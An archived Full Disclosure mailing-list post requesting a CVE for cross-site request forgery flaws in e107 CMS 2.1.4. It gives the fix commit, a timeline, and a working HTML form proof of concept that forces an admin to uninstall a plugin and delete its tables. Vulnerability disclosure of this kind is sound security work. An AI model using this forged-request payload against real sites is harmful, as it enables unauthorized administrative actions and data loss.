下面是原始网页http://seclists.org/fulldisclosure/2017/Apr/40的快照。安全客与该网页作者无关,不对其内容负责。 刷新快照
Full Disclosure: CVE Request:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4
Home page logo

Full Disclosure mailing list archives

CVE Request:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4
From: Wester 95 <evilzyzeng () outlook com>
Date: Fri, 7 Apr 2017 06:04:34 +0000

Hi team,


I would like to request one CVE ID with some issues of e107 CMS.


==========================


Title:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4


Author:Zhiyang Zeng


Product:

—————


e107 is a powerful website content management system designed for bootstrap v3 from http://e107.org/get-started


—————


Fix

—————


Fixed in git source code https://github.com/e107inc/e107/commit/7a3e3d9fc7e05ce6941b9af1c14010bf2141f1a5


—————


Summary


————


e107 CMS version 2.1.4 is vulnerable to cross-site request forgery in plugin-installing,meta-changingand 
settings-changing,a malicious web page can use

forged requests to make e107 download and install a plug-in provided

by the attacker.


————


Timeline


———


2017-03-01   report to vendor


2017-03-02  GitHub commit to fix token missing


———


 Reproduce:


==========


I just give a uninstall any plugins POC.


vul address:http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php


POC:


<form action="http://127.0.0.1/e107_2.1.4_full/e107_admin/plugin.php?uninstall.8"; method="post">

<input type="text" name="delete_tables" value="1">

<input type="text" name="delete_ipool" value="1">


<input type="text" name="delete_files" value="0">

<input type="text" name="uninstall_confirm" value="Confirm uninstall">


<input type="submit" name="submit">

</form>


Description:


I try to uninstall plugin  gallery which id is 8.


visiting beyond POC page, you will find gallery plugin has been uninstalled success!


===========




Best regards,

Zhiyang Zeng of Tencent security platform department


_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

  By Date           By Thread  

Current thread:
  • CVE Request:Mutiple CSRF vulnerabilities in e107 CMS 2.1.4 Wester 95 (Apr 07)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]